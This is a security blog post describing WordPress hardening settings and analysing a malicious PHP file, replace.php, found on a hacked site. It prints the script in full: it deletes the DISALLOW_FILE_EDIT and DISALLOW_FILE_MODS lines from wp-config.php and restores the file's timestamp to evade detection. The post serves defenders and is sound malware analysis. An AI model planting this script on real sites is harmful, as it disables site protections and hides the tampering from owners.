Reverse Hardening WordPress Config

  • July 30, 2019
Reverse Hardening WP Config

Hardening is the process of securing a website or system against known security weaknesses or potential issues to reduce the attack surface. The more functions or features a website has, the more potential points of entry an attacker has to leverage.

For example, a popular method for hardening WordPress installations is to disable the backend theme and plugin editor, which normally allows direct modification to the code in any theme or plugin file.

Theme & Plugin Installers Used as Entry Points

Attackers can also take advantage of the theme and plugin installers within the wp-admin backend. However, instead of installing a legitimate theme or plugin, they use this feature to install a backdoor and maintain access to a compromised website.

Thankfully, WordPress has a feature that allows website owners to disable both the theme and plugin file editors and installers.

To accomplish this, the owner just needs to add a line to their wp-config.php file:

define( 'DISALLOW_FILE_EDIT', true ); //disables file editor
define( 'DISALLOW_FILE_MODS', true ); //disables both file editor and installer

Hardening Methods Reversed in wp-config.php

Since hackers are aware of the attack surface areas, it also makes sense that they would be aware of the most popular hardening methods and respond accordingly.

During a recent website cleanup, the following file was added to the hacked website to reverse the hardening method we described for wp-config.php.

./wp-admin/maint/replace.php:
<?php
$str = file_get_contents("../../wp-config.php");
$str = str_replace("define('DISALLOW_FILE_EDIT', true);","",$str);
$str = str_replace("define('DISALLOW_FILE_MODS', true);","",$str);
$ftime1 = filemtime("../../wp-config.php");
file_put_contents("../../wp-config.php", $str);
touch("../../wp-config.php", $ftime1, $ftime1);
echo "okok.";
?>

In this example, we found the malicious replace.php script in ./wp-admin/maint/.

When running the PHP script, it looks for wp-config.php (two directory levels above its current location).  It then uses str_replace to search for DISALLOW_FILE_EDIT and DISALLOW_FILE_MODS, and looks up the modification timestamp for the wp-config.php file before removing the detected str_replace strings.

After the contents of the wp-config.php file have been adjusted, the script finally uses the touch function to alter the modification timestamp on the wp-config.php file in order to avoid detection.

Conclusion

In this particular case, the hacker compromised the website with an entirely different method and then added this malicious PHP file to further weaken the overall security of the website.

Unfortunately, there are a variety of other ways for hackers to compromise a website without using the theme and plugin editors or installers.

Employing a file integrity monitoring service like the free Sucuri WordPress plugin can be extremely helpful for early detection of a website hack. File integrity monitors won’t be fooled by altered timestamps. They are designed to alert website owners as soon as any changes to files are made against the baseline or last known good configuration.

Luke Leal is a member of the Malware Research team and joined the company in 2015. Luke's main responsibilities include threat research and malware analysis, which is used to improve our tools. His professional experience covers over eight years of deobfuscating malware code and using unique data from it to help in correlating patterns. When he’s not researching infosec issues or working on websites, you might find Luke traveling and learning about new things. Connect with him on Twitter.

Related Tags
Related Categories
You May Also Like